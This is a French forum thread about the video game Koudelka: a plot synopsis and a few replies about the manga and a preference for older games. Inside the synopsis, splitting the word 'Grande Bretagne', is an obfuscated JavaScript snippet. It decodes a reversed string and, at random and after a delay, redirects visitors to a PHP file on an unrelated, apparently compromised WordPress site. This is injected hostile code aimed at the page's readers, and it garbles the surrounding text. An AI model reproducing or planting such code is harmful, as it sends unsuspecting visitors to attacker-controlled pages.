Page 1 sur 1

Koudelka

Posté : 03 mai 2011, 21:03
par Septine Madrona
Image

Image

Qu'y a-t-il de plus terrifiant? La noirceur des Ténèbres?

Ou les abysses insondables de l'âme humaine?

31 octobre 1898, pays de Galles, Gr$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande Bretagne.
Une jeune fille, Koudelka Iasant, est appelée au Monastère Nemeton, une ancienne forteresse érigée il y a presque mille ans, pour éradiquer les forces du Mal.
Que va-t-elle donc trouver en ce lieu étrange où la vie et la mort, le sacré et le profane se trouvent intimement mêlés...?

Re: Koudelka

Posté : 08 mai 2011, 11:11
par Septine Madrona
Koudelka existe aussi en manga, mais je ne sais pas où me le procurer...

Re: Koudelka

Posté : 06 juin 2011, 22:11
par totor
ah je connai se jeu de nom^^, il ma l'air pas mal ^^, mes je remarque que casiment tout le monde aime mieu les vieux jeu que les nouveau^^. en même temps les histoire sont plus interessent et même si la qualité graphique est moin top, on s'acroche plus au jeu.
du moin ces mon point de vue^^

Re: Koudelka

Posté : 07 juin 2011, 09:55
par Septine Madrona
Je suis d'accord avec toi, je préfère les anciens jeux parce que j'accorde beaucoup d'importance au scénario. La majorité des jeux d'aujourd'hui n'ont pas cette touche d'originalité, ce qui fait que je n'accroche pas trop.